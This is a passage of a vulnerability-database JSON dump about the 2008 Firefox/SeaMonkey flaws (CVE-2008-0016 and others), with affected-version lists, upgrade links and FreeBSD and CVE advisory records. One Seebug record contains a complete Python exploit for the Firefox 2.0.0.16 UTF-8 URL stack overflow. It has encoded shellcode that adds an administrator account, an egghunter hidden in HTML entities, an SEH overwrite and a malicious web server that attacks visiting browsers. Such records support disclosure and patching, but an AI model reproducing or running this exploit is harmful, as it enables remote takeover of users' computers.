href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.17 target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.17</a> +1nobinonly-0ubuntu0.7.10_amd64.deb\r\n \r\nMozilla SeaMonkey 1.1.10 \r\nMozilla SeaMonkey Download\r\n<a href=http://www.seamonkey-project.org/releases/ target=_blank>http://www.seamonkey-project.org/releases/</a>\r\n \r\nMozilla SeaMonkey 1.1.11 \r\nMozilla SeaMonkey Download\r\n<a href=http://www.seamonkey-project.org/releases/ target=_blank>http://www.seamonkey-project.org/releases/</a>\r\n \r\nMozilla SeaMonkey 1.1.3 \r\nMozilla SeaMonkey Download\r\n<a href=http://www.seamonkey-project.org/releases/ target=_blank>http://www.seamonkey-project.org/releases/</a>\r\n \r\nMozilla SeaMonkey 1.1.4 \r\nMozilla SeaMonkey Download\r\n<a href=http://www.seamonkey-project.org/releases/ target=_blank>http://www.seamonkey-project.org/releases/</a>\r\n \r\nMozilla SeaMonkey 1.1.5 \r\nMozilla SeaMonkey Download\r\n<a href=http://www.seamonkey-project.org/releases/ target=_blank>http://www.seamonkey-project.org/releases/</a>\r\n \r\nMozilla SeaMonkey 1.1.6 \r\nMozilla SeaMonkey Download\r\n<a href=http://www.seamonkey-project.org/releases/ target=_blank>http://www.seamonkey-project.org/releases/</a>\r\n \r\nMozilla SeaMonkey 1.1.7 \r\nMozilla SeaMonkey Download\r\n<a href=http://www.seamonkey-project.org/releases/ target=_blank>http://www.seamonkey-project.org/releases/</a>\r\n \r\nMozilla SeaMonkey 1.1.8 \r\nMozilla SeaMonkey Download\r\n<a href=http://www.seamonkey-project.org/releases/ target=_blank>http://www.seamonkey-project.org/releases/</a>\r\n \r\nMozilla SeaMonkey 1.1.9 \r\nMozilla SeaMonkey Download\r\n<a href=http://www.seamonkey-project.org/releases/ target=_blank>http://www.seamonkey-project.org/releases/</a>\r\n \r\nMozilla Firefox 2.0 .6\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\n \r\nMozilla Firefox 2.0 .1\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\n \r\nMozilla Firefox 2.0 16\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\n \r\nMozilla Firefox 2.0 .9\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\n \r\nMozilla Firefox 2.0 .5\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\n \r\nMozilla Firefox 2.0 8\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\n \r\nMozilla Firefox 2.0 .7\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\n \r\nMozilla Firefox 2.0 .10\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\n \r\nMozilla Firefox 2.0 .3\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\n \r\nMozilla Firefox 3.0.1 \r\nMozilla Firefox 3 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all.html target=_blank>http://www.mozilla.com/en-US/firefox/all.html</a>", "reporter": "Root", "published": "2008-09-25T00:00:00", "title": "Mozilla Firefox/SeaMonkey/Thunderbird\u591a\u4e2a\u8fdc\u7a0b\u6f0f\u6d1e", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0016", "CVE-2008-3835", "CVE-2008-3836", "CVE-2008-3837", "CVE-2008-4058", "CVE-2008-4059", "CVE-2008-4060", "CVE-2008-4061", "CVE-2008-4062", "CVE-2008-4063", "CVE-2008-4064", "CVE-2008-4065", "CVE-2008-4066", "CVE-2008-4067", "CVE-2008-4068", "CVE-2008-4069"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2008-09-25T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-4101", "id": "SSV:4101", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "", "status": "details"}, {"lastseen": "2017-11-19T21:31:53", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "BUGTRAQ ID: 31397\r\nCVE ID\uff1aCVE-2008-0016\r\nCNCVE ID\uff1aCNCVE-20080016\r\n\r\nMozilla Firefox/SeaMonkey\u662f\u4e00\u6b3e\u5f00\u653e\u6e90\u4ee3\u7801\u7684WEB\u6d4f\u89c8\u5668\u548cWEB\u5e94\u7528\u5957\u4ef6\u3002\r\nMozilla Firefox/SeaMonkey\u5904\u7406UTF-8 URL\u5b58\u5728\u7f13\u51b2\u533a\u6ea2\u51fa\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u4ee5\u5e94\u7528\u7a0b\u5e8f\u6743\u9650\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\r\nMozilla Firefox/SeaMonkey\u5728\u89e3\u6790UTF-8\u7f16\u7801\u7684URL\u65f6\u5b58\u5728\u95ee\u9898\uff0c\u6784\u5efa\u6076\u610f\u975e\u6cd5URL\u6bb5\u4f20\u9012\u7ed9ConvertUTF8toUTF16::write\uff0c\u7531\u4e8e\u8fd9\u4e2a\u65b9\u6cd5\u4e0d\u6b63\u786e\u68c0\u67e5\u5b57\u7b26\u4e32\u6570\u636e\uff0c\u53ef\u5bfc\u81f4\u591a\u5b57\u8282\u5b57\u7b26\u5e8f\u5217\u8d8a\u754c\u62f7\u8d1d\u4e4b\u524d\u5206\u914d\u7684\u6808\u7f13\u51b2\u533a\uff0c\u7cbe\u5fc3\u6784\u5efa\u6076\u610fWEB\u9875\uff0c\u8bf1\u4f7f\u7528\u6237\u8bbf\u95ee\uff0c\u53ef\u5bfc\u81f4\u4ee5\u5e94\u7528\u7a0b\u5e8f\u6743\u9650\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\n\nUbuntu Ubuntu Linux 8.04 LTS sparc\r\nUbuntu Ubuntu Linux 8.04 LTS powerpc\r\nUbuntu Ubuntu Linux 8.04 LTS lpia\r\nUbuntu Ubuntu Linux 8.04 LTS i386\r\nUbuntu Ubuntu Linux 8.04 LTS amd64\r\nUbuntu Ubuntu Linux 7.10 sparc\r\nUbuntu Ubuntu Linux 7.10 powerpc\r\nUbuntu Ubuntu Linux 7.10 lpia\r\nUbuntu Ubuntu Linux 7.10 i386\r\nUbuntu Ubuntu Linux 7.10 amd64\r\nUbuntu Ubuntu Linux 7.04 sparc\r\nUbuntu Ubuntu Linux 7.04 powerpc\r\nUbuntu Ubuntu Linux 7.04 i386\r\nUbuntu Ubuntu Linux 7.04 amd64\r\nUbuntu Ubuntu Linux 6.06 LTS sparc\r\nUbuntu Ubuntu Linux 6.06 LTS powerpc\r\nUbuntu Ubuntu Linux 6.06 LTS i386\r\nUbuntu Ubuntu Linux 6.06 LTS amd64\r\nRedHat Linux Advanced Workstation 2.1 for the Ita 2.1 IA64\r\nRedHat Enterprise Linux WS 4\r\nRedHat Enterprise Linux WS 3\r\nRedHat Enterprise Linux WS 2.1\r\nRedHat Enterprise Linux ES 4\r\nRedHat Enterprise Linux ES 3\r\nRedHat Enterprise Linux ES 2.1\r\nRedHat Enterprise Linux AS 4\r\nRedHat Enterprise Linux AS 3\r\nRedHat Enterprise Linux AS 2.1\r\nRedHat Desktop 4.0 \r\nRedHat Desktop 3.0 \r\nMozilla SeaMonkey 1.1.11 \r\nMozilla SeaMonkey 1.1.10 \r\nMozilla SeaMonkey 1.1.9 \r\nMozilla SeaMonkey 1.1.8 \r\nMozilla SeaMonkey 1.1.7 \r\nMozilla SeaMonkey 1.1.6 \r\nMozilla SeaMonkey 1.1.5 \r\nMozilla SeaMonkey 1.1.4 \r\nMozilla SeaMonkey 1.1.3 \r\nMozilla SeaMonkey 1.1.2 \r\nMozilla SeaMonkey 1.1.1 \r\nMozilla SeaMonkey 1.0.99 \r\nMozilla SeaMonkey 1.0.9 \r\nMozilla SeaMonkey 1.0.8 \r\nMozilla SeaMonkey 1.0.7 \r\nMozilla SeaMonkey 1.0.6 \r\nMozilla SeaMonkey 1.0.5 \r\nMozilla SeaMonkey 1.0.3 \r\nMozilla SeaMonkey 1.0.2 \r\nMozilla SeaMonkey 1.0.1 \r\nMozilla SeaMonkey 1.1 beta\r\nMozilla SeaMonkey 1.0 dev\r\nMozilla SeaMonkey 1.0\r\nMozilla Firefox 2.0 8\r\nMozilla Firefox 2.0 16\r\nMozilla Firefox 2.0 .9\r\nMozilla Firefox 2.0 .7\r\nMozilla Firefox 2.0 .6\r\nMozilla Firefox 2.0 .5\r\nMozilla Firefox 2.0 .4\r\nMozilla Firefox 2.0 .3\r\nMozilla Firefox 2.0 .10\r\nMozilla Firefox 2.0 .1\r\nMozilla Firefox 2.0.0.3\r\nMozilla Firefox 2.0.0.2\r\nMozilla Firefox 2.0.0.15\r\nMozilla Firefox 2.0.0.14\r\nMozilla Firefox 2.0.0.13\r\nMozilla Firefox 2.0.0.12\r\nMozilla Firefox 2.0.0.11\r\nMozilla Firefox 2.0.0.10\r\nMozilla Firefox 2.0.0.10\r\nMozilla Firefox 2.0 RC3\r\nMozilla Firefox 2.0 RC2\r\nMozilla Firefox 2.0 beta 1\r\nMozilla Firefox 2.0\r\n\n \u5347\u7ea7\u7a0b\u5e8f\uff1a\r\nMozilla Firefox 2.0.0.14\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\nMozilla Firefox 2.0.0.13\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\nMozilla Firefox 2.0 RC2\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\nMozilla Firefox 2.0 beta 1\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\nMozilla Firefox 2.0.0.15\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\nMozilla Firefox 2.0.0.10\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\nMozilla SeaMonkey 1.1 beta\r\nMozilla SeaMonkey Download\r\n<a href=http://www.seamonkey-project.org/releases/ target=_blank>http://www.seamonkey-project.org/releases/</a>\r\nMozilla Firefox 2.0.0.10\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\nMozilla Firefox 2.0.0.12\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\nMozilla Firefox 2.0.0.11\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\nMozilla Firefox 2.0.0.2\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\nMozilla Firefox 2.0\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\nMozilla Firefox 2.0.0.3\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\nMozilla Firefox 2.0 RC3\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\nMozilla SeaMonkey 1.1.1 \r\nMozilla SeaMonkey Download\r\n<a href=http://www.seamonkey-project.org/releases/ target=_blank>http://www.seamonkey-project.org/releases/</a>\r\nMozilla SeaMonkey 1.1.10 \r\nMozilla SeaMonkey Download\r\n<a href=http://www.seamonkey-project.org/releases/ target=_blank>http://www.seamonkey-project.org/releases/</a>\r\nMozilla SeaMonkey 1.1.11 \r\nMozilla SeaMonkey Download\r\n<a href=http://www.seamonkey-project.org/releases/ target=_blank>http://www.seamonkey-project.org/releases/</a>\r\nMozilla SeaMonkey 1.1.2 \r\nMozilla SeaMonkey Download\r\n<a href=http://www.seamonkey-project.org/releases/ target=_blank>http://www.seamonkey-project.org/releases/</a>\r\nMozilla SeaMonkey 1.1.3 \r\nMozilla SeaMonkey Download\r\n<a href=http://www.seamonkey-project.org/releases/ target=_blank>http://www.seamonkey-project.org/releases/</a>\r\nMozilla SeaMonkey 1.1.4 \r\nMozilla SeaMonkey Download\r\n<a href=http://www.seamonkey-project.org/releases/ target=_blank>http://www.seamonkey-project.org/releases/</a>\r\nMozilla SeaMonkey 1.1.5 \r\nMozilla SeaMonkey Download\r\n<a href=http://www.seamonkey-project.org/releases/ target=_blank>http://www.seamonkey-project.org/releases/</a>\r\nMozilla SeaMonkey 1.1.6 \r\nMozilla SeaMonkey Download\r\n<a href=http://www.seamonkey-project.org/releases/ target=_blank>http://www.seamonkey-project.org/releases/</a>\r\nMozilla SeaMonkey 1.1.7 \r\nMozilla SeaMonkey Download\r\n<a href=http://www.seamonkey-project.org/releases/ target=_blank>http://www.seamonkey-project.org/releases/</a>\r\nMozilla SeaMonkey 1.1.8 \r\nMozilla SeaMonkey Download\r\n<a href=http://www.seamonkey-project.org/releases/ target=_blank>http://www.seamonkey-project.org/releases/</a>\r\nMozilla SeaMonkey 1.1.9 \r\nMozilla SeaMonkey Download\r\n<a href=http://www.seamonkey-project.org/releases/ target=_blank>http://www.seamonkey-project.org/releases/</a>\r\nMozilla Firefox 2.0 .6\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\nMozilla Firefox 2.0 .1\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\nMozilla Firefox 2.0 16\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\nMozilla Firefox 2.0 .9\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\nMozilla Firefox 2.0 .5\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\nMozilla Firefox 2.0 8\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\nMozilla Firefox 2.0 .7\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\nMozilla Firefox 2.0 .10\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\nMozilla Firefox 2.0 .3\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\nMozilla Firefox 2.0 .4\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>", "reporter": "Root", "published": "2008-09-27T00:00:00", "title": "Mozilla Firefox/SeaMonkey UTF-8\u57fa\u4e8e\u6808\u7684\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0016"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2008-09-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-4117", "id": "SSV:4117", "sourceData": "\n \u53ef\u53c2\u8003\u5982\u4e0b\u6d4b\u8bd5\u7a0b\u5e8f\uff1a\r\nhttps://www.immunityinc.com/downloads/immpartners/firefox_utf8.tar.gz\r\n \n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-4117", "status": "poc,details"}, {"lastseen": "2017-11-19T18:35:00", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "No description provided by source.", "reporter": "Root", "published": "2009-09-16T00:00:00", "title": "Mozilla Firefox 2.0.0.16 UTF-8 URL Remote Buffer Overflow Exploit", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0016"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2009-09-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-12305", "id": "SSV:12305", "sourceData": "\n #!/usr/bin/python\r\n# FireFox 2.0.0.16 Windows XP SP3 x86 Remote Exploit\r\n# Author: Dominic Chell <dmc@deadbeef.co.uk>\r\n#\r\n# Exploits the UTF-8 URL overflow vulnerability described in CVE-2008-0016.\r\n# As of September 2009 there are no public exploits for this vulnerability.\r\n# However, according to securityfocus an exploit is available in both Canvas\r\n# and Core Impact.\r\n#\r\n# Thanks to meta and ChrisA\r\n\r\nfrom BaseHTTPServer import HTTPServer \r\nfrom BaseHTTPServer import BaseHTTPRequestHandler \r\nimport sys \r\n\r\n# Adduser shellcode encoded with shikata_ga_nai\r\n# USER=r00t PASS=r00tr00t!!\r\negg = (\r\n\t"\\xda\\xd4\\x29\\xc9\\xb8\\xb3\\xfe\\x8b\\x54\\xd9\\x74\\x24\\xf4\\xb1\\x32"\r\n\t"\\x5f\\x83\\xef\\xfc\\x31\\x47\\x14\\x03\\x47\\xa7\\x1c\\x7e\\xa8\\x2f\\xa4"\r\n\t"\\x81\\x51\\xaf\\xae\\xc7\\x6d\\x24\\xcc\\xc2\\xf5\\x3b\\xc2\\x46\\x4a\\x23"\r\n\t"\\x97\\x06\\x75\\x52\\x4c\\xf1\\xfe\\x60\\x19\\x03\\xef\\xb9\\xdd\\x9d\\x43"\r\n\t"\\x3d\\x1d\\xe9\\x9c\\xfc\\x54\\x1f\\xa2\\x3c\\x83\\xd4\\x9f\\x94\\x70\\x11"\r\n\t"\\x95\\xf1\\xf2\\x46\\x71\\xf8\\xef\\x1f\\xf2\\xf6\\xa4\\x54\\x5b\\x1a\\x3a"\r\n\t"\\x80\\xef\\x3e\\xb7\\x57\\x1b\\xb7\\x9b\\x73\\xdf\\x04\\x7c\\x4d\\x29\\xea"\r\n\t"\\xd5\\xc9\\x5e\\xac\\xe9\\x9a\\x21\\x3c\\x81\\xed\\xbd\\x91\\x1e\\x65\\xb6"\r\n\t"\\x60\\xd8\\xf5\\x06\\x18\\x49\\x92\\x76\\x56\\x6d\\x3d\\x1f\\xfe\\x90\\x4b"\r\n\t"\\xd1\\xa9\\x93\\xab\\x8d\\x38\\x08\\x1a\\x37\\xba\\xb5\\x42\\x98\\x59\\x16"\r\n\t"\\xed\\x83\\xe9\\x76\\x84\\x38\\x74\\x05\\x46\\xcd\\x46\\xd9\\xf2\\x11\\xd4"\r\n\t"\\x29\\xcb\\x25\\x6a\\x7a\\x1b\\xb2\\xab\\x5b\\x7b\\x15\\xea\\xdf\\x3f\\x49"\r\n\t"\\xca\\xf9\\x9f\\xe7\\x77\\x72\\xc0\\x9b\\x18\\x19\\x61\\x08\\x81\\xaf\\x0e"\r\n\t"\\xa5\\x3d\\x70\\x90\\x21\\xd0\\x19\\x7c\\xc3\\x59\\xae\\xf2\\x72\\xe9\\x21"\r\n\t"\\x81\\x07\\x31\\xcc\\x55\\xd8\\x45\\x10\\xb9\\x59\\xe1\\x14\\xc5\\x53")\r\n\r\n# Egghunter where egg is 0x41424142.\r\n# The egghunter is encoded as HTML entities, this evades the unicode conversion.\r\n# Egghunter courtesy of skape. Modified to xor edx,edx as first instruction.\r\nshellcode = (\r\n\t"&#xD233;&#x9090;&#x9090;&#x4290;&#x6a52;&#x5802;&#x2ecd;"\r\n\t"&#x053c;&#x745a;&#xb8ef;&#x4142;&#x4142;&#xfa8b;&#x75af;"\r\n\t"&#xafea;&#xe775;&#xe7ff;&#xcccc;&#xcccc;&#xcccc;&#xcccc;"\r\n\t"&#xcccc;&#xcccc;&#xcccc;&#xcccc;")\r\n\r\n# The UTF-8 character in the URL triggers the code path where the overflow occurs.\r\ns = "\\xC3\\xBA"\r\nu = unicode(s, "utf-8")\r\nutf8chars = u.encode( "utf-8" )\r\n\r\nclass myRequestHandler(BaseHTTPRequestHandler):\r\n\r\n\tdef create_exploit_buffer(self):\r\n\t\thtml = "<meta http-equiv=\\"Content-Type\\" content=\\"text/html;charset=utf-8\\" />\\n<html>\\n<body>\\n"\r\n\r\n\t\t# Store the egg and adduser shellcode in CDATA\r\n\t\t# The egghunter will try and find this in memory\r\n\t\thtml += "<!CDATA[" + "\\x42\\x41\\x42\\x41\\x42\\x41\\x42\\x41" + egg\r\n\t\thtml += "]>\\n"\r\n\r\n\t\thtml += "<a href=\\""\r\n\t\thtml += "\\x01"\r\n\t\thtml += "xx://dmc"\r\n\t\thtml += utf8chars\r\n\t\thtml += "/"\r\n\t\t\r\n\t\thtml += "&#x9090;" * 1700\t# Windows XP SP3 SEH offset\r\n\t\thtml += "&#4331;&#37008;"\t# unicode - ptr to next seh "\\xeb\\x10\\x90\\x90";\r\n\t\thtml += "&#x11e7;&#x6037;"\t# 0x603711e7 - pop/pop/ret - xpcom_core.dll\r\n\t\thtml +="&#x9090;" * 10\r\n\t\thtml += shellcode # add egghunter\r\n\t\thtml +="&#x9090;" * 10\r\n\t\thtml += "\\" >s</a>"\r\n\t\thtml += "\\n</body>"\r\n\t\thtml += "\\n</html>"\r\n\t\r\n\t\treturn html\r\n\r\n\tdef do_GET(self):\r\n\t\tself.printCustomHTTPResponse(200)\r\n\t\tif self.path == "/":\r\n\t\t\ttarget=self.client_address[0]\r\n\t\t\thtml = self.create_exploit_buffer()\r\n\t\t\tself.wfile.write(html)\r\n\t\t\tprint "[*] Evil payload sent\\n[*] Wait a few minutes and try connecting with r00t/r00tr00t!!\\n"\r\n\t\t\t\r\n\tdef printCustomHTTPResponse(self, respcode):\r\n\t\tself.send_response(respcode)\r\n\t\tself.send_header("Content-type", "text/html")\r\n\t\tself.send_header("Server", "myRequestHandler")\r\n\t\tself.end_headers()\r\n\r\nprint "FireFox 2.0.0.16 x86 Exploit\\nAuthor: dmc@deadbeef.co.uk\\n"\r\nprint "[*] Starting evil web server"\r\nprint "[*] Waiting for clients\\n"\r\n\r\nhttpd = HTTPServer(('', 80), myRequestHandler)\r\n\r\ntry:\r\n\thttpd.handle_request()\r\n\thttpd.serve_forever() \r\nexcept KeyboardInterrupt:\r\n\tprint "\\n\\n[*] Interupt caught, exiting.\\n\\n"\r\n\tsys.exit(1)\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-12305", "status": "poc"}], "freebsd": [{"lastseen": "2018-08-31T01:15:32", "references": ["http://www.mozilla.org/security/announce/2008/mfsa2008-41.html", "http://www.mozilla.org/security/announce/2008/mfsa2008-44.html", "http://www.mozilla.org/security/announce/2008/mfsa2008-45.html", "http://www.mozilla.org/security/announce/2008/mfsa2008-38.html", "http://www.mozilla.org/security/announce/2008/mfsa2008-37.html", "http://www.mozilla.org/security/announce/2008/mfsa2008-40.html", "http://www.mozilla.org/security/announce/2008/mfsa2008-39.html", "http://www.mozilla.org/security/announce/2008/mfsa2008-43.html", "http://www.mozilla.org/security/announce/2008/mfsa2008-42.html"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "2.0", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "flock", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.1.12", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "seamonkey", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "2.0.0.17", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-thunderbird", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "2.0.0.17", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-firefox-devel", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "2.0", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-flock", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "2.0.0.17", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "thunderbird", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "2.0.0.17,1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "firefox", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "2.0.0.17", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-firefox", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.1.12", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-seamonkey", "operator": "lt"}], "description": "\nThe Mozilla Foundation reports:\n\nMFSA 2008-37UTF-8 URL stack buffer overflow\nMFSA 2008-38nsXMLDocument::OnChannelRedirect() same-origin\n\t violation\nMFSA 2008-39Privilege escalation using feed preview page and\n\t XSS flaw\nMFSA 2008-40Forced mouse drag\nMFSA 2008-41Privilege escalation via XPCnativeWrapper\n\t pollution\nMFSA 2008-42Crashes with evidence of memory corruption\n\t (rv:1.9.0.2/1.8.1.17)\nMFSA 2008-43BOM characters stripped from JavaScript before\n\t execution\nMFSA 2008-44resource: traversal vulnerabilities\nMFSA 2008-45XBM image uninitialized memory reading\n\n", "edition": 3, "reporter": "FreeBSD", "published": "2008-09-24T00:00:00", "title": "mozilla -- multiple vulnerabilities", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2008-3835", "CVE-2008-4063", "CVE-2008-4067", "CVE-2008-3836", "CVE-2008-4069", "CVE-2008-0016", "CVE-2008-4059", "CVE-2008-3837", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4064", "CVE-2008-4061", "CVE-2008-4065"], "modified": "2009-12-12T00:00:00", "id": "2273879E-8A2F-11DD-A6FE-0030843D3802", "href": "https://vuxml.freebsd.org/freebsd/2273879e-8a2f-11dd-a6fe-0030843d3802.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2017-09-29T14:26:05", "references": ["http://www.mozilla.org/security/announce/2008/mfsa2008-41.html", "http://www.debian.org/security/2008/dsa-1669", "http://slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.412123", "http://www.securityfocus.com/bid/31346", "http://www.mandriva.com/security/advisories?name=MDVSA-2008:206", "http://www.vupen.com/english/advisories/2009/0977", "http://www.mandriva.com/security/advisories?name=MDVSA-2008:205", "http://slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.379422", "http://www.vupen.com/english/advisories/2008/2661", "http://www.redhat.com/support/errata/RHSA-2008-0882.html", "http://www.debian.org/security/2008/dsa-1649", "https://exchange.xforce.ibmcloud.com/vulnerabilities/45349", "http://www.debian.org/security/2009/dsa-1696", "https://www.redhat.com/archives/fedora-package-announce/2008-September/msg01403.html", "https://www.redhat.com/archives/fedora-package-announce/2008-September/msg01335.html", "http://www.ubuntu.com/usn/usn-645-2", "http://www.debian.org/security/2009/dsa-1697", 